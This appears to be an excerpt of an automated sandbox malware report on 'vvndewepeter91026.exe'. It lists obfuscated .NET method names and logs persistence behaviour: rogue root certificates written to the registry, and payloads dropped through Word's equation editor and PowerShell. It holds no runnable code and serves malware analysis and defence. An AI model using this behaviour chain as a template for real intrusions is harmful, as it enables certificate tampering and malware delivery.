                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, ksWtZCxKsl0TxRCTo8.csHigh entropy of concatenated method names: 'GMr1LFkylo', 'hBS1ywuum5', 'ro41O5nLLW', 'VWvOoTrbwJ', 'x5aOzGVTLw', 'IAf18nrD6A', 'n5n19G5FS1', 'fBl1kLDsu7', 'j8A1QDxhFt', 'QhN1d7YRXe'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, pLwTg0qqY9GrvEoZXIs.csHigh entropy of concatenated method names: 'ToString', 'a145Q4j8pu', 'KEt5dvERQh', 'DdN5I8eM0e', 'f0E5LRPIbe', 'wT056EPSsu', 'gSU5yxunrt', 'Gsw5EYZYIa', 'f7knYFscmhRWVWPDeQu', 'mTw6y3s22lokcZlLY0g'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, E0RYX9X2eibsstJT2l.csHigh entropy of concatenated method names: 'MToQIXKWBI', 'I3SQLs48n8', 'uf5Q6q4VEy', 'KWqQy0BBF1', 'UBEQEkuB7E', 'mIqQOFIKAA', 'wXWQ1wxG4a', 'sO5QKUDr8X', 'UTHQ7jmngF', 'T7eQFOJ0LT'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, lDlgAUP9SyyXYURNLR.csHigh entropy of concatenated method names: 'EJi4pnojSnyAHRWqhYg', 'ErevP5orqMYelnaL321', 'kFEORtVAdX', 'Ku5Ox8stk6', 'OVRO5Ji6lb', 'CxNx8bo8umiUIrPhE6k', 'lIrvcSoddavqGvXHa7M'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, sC7nprRRvT8OJFZjOZ.csHigh entropy of concatenated method names: 'rIk91RDsii', 'EuM9KyEpgg', 'KVG9F5wdH3', 'bJN9UWuJYc', 'ATy9J00PbH', 'l2k9e5iRIA', 'vgjpq3mDGeNj5ln0ix', 'wBXtHAIWQFkdYio0Cv', 'BC899EETi8', 'CUS9QYaSid'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, fSdvMKZMagrtwMm7Ri.csHigh entropy of concatenated method names: 'lq2yprocYj', 'nEuyDyGS7y', 'IYryswC2ld', 'nvAy3Hoa8O', 'hRjyJPOISS', 'jDsyeSX940', 'o7iyCsHSMo', 'DnVyR9lYX6', 'DTQyx7NjxD', 'mKPy5h79Hy'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, O9PymkJ3NMlC2399qj.csHigh entropy of concatenated method names: 'JKQhsEQCnj', 'o1Ah3VGbtY', 'GAThHYAQtH', 'Enah09bSsm', 'XX6hbdHFie', 'lgehgYG4SG', 'TZAhf0svRZ', 'TJEhckoEtg', 'RcthTZ3osW', 'FO5hjXiRBb'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, pBjySHqM5QnwRNWaSBd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q9V5qOaeUr', 'h9u5XNVCx7', 'ufn5G8oA96', 'hl95AuUrbM', 'hsu5SjNYox', 'xFD5N7vpyl', 'Skh5Ydgfbf'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, xGB0Wf6bc0bOdc8jTI.csHigh entropy of concatenated method names: 'kTtEwQ9SoG', 'kClEM2Olvv', 'OTJynuxQtD', 'jUNybontt7', 'lvTyg7lONl', 'Up9yi4TYcW', 'myLyfre4Cc', 'fSgycK60ak', 'kBRyWA5x19', 'hseyTKO9Er'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, KdpVO0auC752URy1LH.csHigh entropy of concatenated method names: 'ToString', 'Po7ejc2CtV', 'Li3e0yrEQ1', 'gqcenHUq3F', 'cTYebFVO9p', 'n2CegR7eyF', 'kTfeiJlr7P', 'jBIefowaER', 'jS7ecR3arw', 'iuMeWWiTPi'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, AnptoFjC7pNu1LqbY6.csHigh entropy of concatenated method names: 'CxkCFyqNu8', 'tj9CULHR6k', 'ToString', 'jC5CL1HVrm', 'MYdC69JfMJ', 'f0gCy1rBOY', 'pTuCEljQqC', 'NKNCOjgG2b', 'YOeC1GsAfv', 'GMgCKDLHCP'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, qyT5B9fG4eENyHVdsw.csHigh entropy of concatenated method names: 'GDqlxlYY4', 'hF5peEa0M', 'o9TDoN5Sa', 'wU4MruruE', 'K6k3fAj0h', 'DvImOJLqB', 'zPRJ50FG9eMejJkPmf', 'xSdN05GCNU8MZjBOu4', 'LtVR8YQni', 'nNH5UoFYi'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, ojeKecA3ycAgUvCgAn.csHigh entropy of concatenated method names: 'BIix9SCJrv', 'PtdxQIBCLk', 'IYPxdRPe6o', 'J5cxL9cHMs', 'CZAx6rxAZF', 'DFAxEvYZXS', 'VmAxOPV1Wm', 'AjdRYjjrNi', 'K6VRuXW5nW', 'EtMRayGmQ3'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, kIOpWCowqWShKUKAee.csHigh entropy of concatenated method names: 'fE5OI5NlLu', 'JfaO6bhCVu', 'PbdOEEUXYB', 'HStO1rReIi', 'FpJOKcMl0A', 'Ae8ESKhqgT', 'xT8ENk6Jhd', 'ISGEY5g6xW', 'Gq6EuAu9tU', 'O17EaNTZyA'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, KSQ07YHqchvMXla9N1.csHigh entropy of concatenated method names: 'KKiRLLy6UN', 'HyrR6tuCpv', 'I8FRyKkQtY', 'FLLREStOBv', 'y0gROgqMIT', 'fE7R1G5hdk', 'gYnRKgLSgW', 'eixR7pHk04', 'g1yRFMTaBb', 'qkbRU4rFDr'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, Uel8r1lQF2PkteGZrv.csHigh entropy of concatenated method names: 'ltB6qcLvY0', 'brs6XHEJGa', 'WxM6GUBM0C', 'vP96AccmpA', 'YcG6SWCc1l', 'ePZ6NA8XmP', 'GaS6YUKp4S', 'ygy6uRCKrX', 'miQ6aI944q', 's4k6o6UxDd'
                  Source: 5.2.vvndewepeter91026.exe.252ee54.5.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, Rsjwms4Wh8At7jltVf.csHigh entropy of concatenated method names: 'saV14aRn5H', 'moE1P52r93', 'TKw1lioyLO', 'Tgp1pca6Bh', 'Cmy1we7IUo', 'Wgq1DupFs5', 'CaI1Mi57nK', 'Lbw1sLeqBx', 'idZ13c8NAv', 'O0T1mxeA09'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, hnb1mywmKd17dlbrAS.csHigh entropy of concatenated method names: 'Dispose', 'mR89ae4IBQ', 'SJdk0qMKGV', 'puBVVvKaKN', 'tps9oyNhKU', 'PRD9z8IgcF', 'ProcessDialogKey', 'E2dk8n82kY', 't9gk9jtrH3', 'mBmkkAPsqe'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, LVNaJWsMIVA7LTLASE.csHigh entropy of concatenated method names: 'zu7RHG1UCo', 'vEbR0GP5w9', 'Eo1RnLElCC', 'zSyRb4C8gr', 'L0DRqt1jRb', 'TXZRg6Ppie', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, D33N8oUtGVx7cDxPuT.csHigh entropy of concatenated method names: 'Lp7JThJpMH', 'q8ZJr8Jvgu', 'xaoJqZNHsW', 'CwFJX9qL4U', 'BgjJ0sJB97', 'HlbJnZxrmw', 'UUJJbpHxl3', 'TmgJgfpCvS', 'OX8Jiv5yws', 'f4pJfSeAAh'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, zQyvpDqyxKTxd6tm0NN.csHigh entropy of concatenated method names: 'GR7x4eMqyc', 'Kq8xPbdu6R', 'J7BxlIIphe', 'GQ7xpT3Nxd', 'LmaxwG8D2Y', 'R9hxDqi7L0', 'Ax6xMaB0Zt', 'NxYxs9KyRH', 'MlHx3p2K2W', 'VG5xmLUKfn'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, ksWtZCxKsl0TxRCTo8.csHigh entropy of concatenated method names: 'GMr1LFkylo', 'hBS1ywuum5', 'ro41O5nLLW', 'VWvOoTrbwJ', 'x5aOzGVTLw', 'IAf18nrD6A', 'n5n19G5FS1', 'fBl1kLDsu7', 'j8A1QDxhFt', 'QhN1d7YRXe'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, pLwTg0qqY9GrvEoZXIs.csHigh entropy of concatenated method names: 'ToString', 'a145Q4j8pu', 'KEt5dvERQh', 'DdN5I8eM0e', 'f0E5LRPIbe', 'wT056EPSsu', 'gSU5yxunrt', 'Gsw5EYZYIa', 'f7knYFscmhRWVWPDeQu', 'mTw6y3s22lokcZlLY0g'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, E0RYX9X2eibsstJT2l.csHigh entropy of concatenated method names: 'MToQIXKWBI', 'I3SQLs48n8', 'uf5Q6q4VEy', 'KWqQy0BBF1', 'UBEQEkuB7E', 'mIqQOFIKAA', 'wXWQ1wxG4a', 'sO5QKUDr8X', 'UTHQ7jmngF', 'T7eQFOJ0LT'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, lDlgAUP9SyyXYURNLR.csHigh entropy of concatenated method names: 'EJi4pnojSnyAHRWqhYg', 'ErevP5orqMYelnaL321', 'kFEORtVAdX', 'Ku5Ox8stk6', 'OVRO5Ji6lb', 'CxNx8bo8umiUIrPhE6k', 'lIrvcSoddavqGvXHa7M'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, sC7nprRRvT8OJFZjOZ.csHigh entropy of concatenated method names: 'rIk91RDsii', 'EuM9KyEpgg', 'KVG9F5wdH3', 'bJN9UWuJYc', 'ATy9J00PbH', 'l2k9e5iRIA', 'vgjpq3mDGeNj5ln0ix', 'wBXtHAIWQFkdYio0Cv', 'BC899EETi8', 'CUS9QYaSid'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, fSdvMKZMagrtwMm7Ri.csHigh entropy of concatenated method names: 'lq2yprocYj', 'nEuyDyGS7y', 'IYryswC2ld', 'nvAy3Hoa8O', 'hRjyJPOISS', 'jDsyeSX940', 'o7iyCsHSMo', 'DnVyR9lYX6', 'DTQyx7NjxD', 'mKPy5h79Hy'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, O9PymkJ3NMlC2399qj.csHigh entropy of concatenated method names: 'JKQhsEQCnj', 'o1Ah3VGbtY', 'GAThHYAQtH', 'Enah09bSsm', 'XX6hbdHFie', 'lgehgYG4SG', 'TZAhf0svRZ', 'TJEhckoEtg', 'RcthTZ3osW', 'FO5hjXiRBb'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, pBjySHqM5QnwRNWaSBd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q9V5qOaeUr', 'h9u5XNVCx7', 'ufn5G8oA96', 'hl95AuUrbM', 'hsu5SjNYox', 'xFD5N7vpyl', 'Skh5Ydgfbf'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, xGB0Wf6bc0bOdc8jTI.csHigh entropy of concatenated method names: 'kTtEwQ9SoG', 'kClEM2Olvv', 'OTJynuxQtD', 'jUNybontt7', 'lvTyg7lONl', 'Up9yi4TYcW', 'myLyfre4Cc', 'fSgycK60ak', 'kBRyWA5x19', 'hseyTKO9Er'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, KdpVO0auC752URy1LH.csHigh entropy of concatenated method names: 'ToString', 'Po7ejc2CtV', 'Li3e0yrEQ1', 'gqcenHUq3F', 'cTYebFVO9p', 'n2CegR7eyF', 'kTfeiJlr7P', 'jBIefowaER', 'jS7ecR3arw', 'iuMeWWiTPi'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, AnptoFjC7pNu1LqbY6.csHigh entropy of concatenated method names: 'CxkCFyqNu8', 'tj9CULHR6k', 'ToString', 'jC5CL1HVrm', 'MYdC69JfMJ', 'f0gCy1rBOY', 'pTuCEljQqC', 'NKNCOjgG2b', 'YOeC1GsAfv', 'GMgCKDLHCP'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, qyT5B9fG4eENyHVdsw.csHigh entropy of concatenated method names: 'GDqlxlYY4', 'hF5peEa0M', 'o9TDoN5Sa', 'wU4MruruE', 'K6k3fAj0h', 'DvImOJLqB', 'zPRJ50FG9eMejJkPmf', 'xSdN05GCNU8MZjBOu4', 'LtVR8YQni', 'nNH5UoFYi'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, ojeKecA3ycAgUvCgAn.csHigh entropy of concatenated method names: 'BIix9SCJrv', 'PtdxQIBCLk', 'IYPxdRPe6o', 'J5cxL9cHMs', 'CZAx6rxAZF', 'DFAxEvYZXS', 'VmAxOPV1Wm', 'AjdRYjjrNi', 'K6VRuXW5nW', 'EtMRayGmQ3'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, kIOpWCowqWShKUKAee.csHigh entropy of concatenated method names: 'fE5OI5NlLu', 'JfaO6bhCVu', 'PbdOEEUXYB', 'HStO1rReIi', 'FpJOKcMl0A', 'Ae8ESKhqgT', 'xT8ENk6Jhd', 'ISGEY5g6xW', 'Gq6EuAu9tU', 'O17EaNTZyA'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, KSQ07YHqchvMXla9N1.csHigh entropy of concatenated method names: 'KKiRLLy6UN', 'HyrR6tuCpv', 'I8FRyKkQtY', 'FLLREStOBv', 'y0gROgqMIT', 'fE7R1G5hdk', 'gYnRKgLSgW', 'eixR7pHk04', 'g1yRFMTaBb', 'qkbRU4rFDr'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, Uel8r1lQF2PkteGZrv.csHigh entropy of concatenated method names: 'ltB6qcLvY0', 'brs6XHEJGa', 'WxM6GUBM0C', 'vP96AccmpA', 'YcG6SWCc1l', 'ePZ6NA8XmP', 'GaS6YUKp4S', 'ygy6uRCKrX', 'miQ6aI944q', 's4k6o6UxDd'

                  Persistence and Installation Behavior

                  barindex
                  Installs new ROOT certificates
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\LLnsOpxxAnmWi[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
